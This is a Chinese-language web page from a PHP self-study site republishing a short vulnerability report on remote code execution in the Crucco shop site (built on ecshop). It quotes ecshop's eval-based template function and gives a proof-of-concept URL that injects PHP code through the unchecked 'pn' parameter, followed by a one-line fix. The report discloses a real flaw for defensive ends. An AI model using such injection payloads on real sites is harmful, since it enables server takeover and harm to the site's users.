初刻Crucco主站任意代码执行 - 网站安全 - 自学p-自学php网

主页 > 后端 > 网站安全 >

初刻Crucco主站任意代码执行 - 网站安全 - 自学p

来源：自学PHP网时间：2015-04-17 12:00 作者：阅读:次

[导读] 初刻用的是ecshop，但是程序员二次开发中太过随意，导致问题产生。。。http://www.crucco.com/huodongye.php?pn=zucefangsi在这里我们发现pn的值没有指定，可以任意提交，我们推断应该程序员写成...

初刻用的是ecshop，但是程序员二次开发中太过随意，导致问题产生。。。

http://www.crucco.com/huodongye.php?pn=zucefangsi

在这里我们发现pn的值没有指定，可以任意提交，我们推断应该程序员写成以下代码

$smarty->display($_GET['p']);

我们找到ecshop中的 display方法发现里面用了eval

function _eval($content)

{

ob_start();

eval('?' . '>' . trim($content));

$content = ob_get_contents();

ob_end_clean();

return $content;

}

我们提交以下url:

http://www.crucco.com/huodongye.php?pn=str:%3C?php%20phpinfo%28%29;//

会发现可爱的phpinfo出来了

修复方案：

指定pn的值

果壳主站SQL注射，可获取站内用户数据 - 网站安

躺在床上读代码之phpcms sql注射漏洞 - 网站安全

最新评论

加载更多~~

添加评论

更多文章推荐

cuteeditor编辑器利用方法两则 - 网站安全 - 自学 2015-04-17
Oracle 数据库之克隆方法 - Windows操作系统 - 自学 2015-04-17
完全掌握Windows系统还原12招 - Windows操作系统 - 自 2015-04-17
简化版XP SP3安装IIS的解决方案 - Windows操作系统 2015-04-17
将博cms(Jumbotcms) 5.X所有版本注入漏洞及修复 - 网 2015-04-17
记一次绕过简单SQL防注入爆菊 - 网站安全 - 自学 2015-04-17
网易贺卡频道的一个跨站bug - 网站安全 - 自学p 2015-04-17
只用记事本就能去除迅雷广告 - Windows操作系统 2015-04-17
KindEditor编辑器上传修改拿shell漏洞 - 网站安全 2015-04-17
17173系统/服务运维配置不当导致整站源码泄露及 2015-04-17

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习，以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明：本站所有视频，教程都由网友上传，站长收集和分享给大家学习使用，如由牵扯版权问题请联系站长邮箱904561283@qq.com



添加评论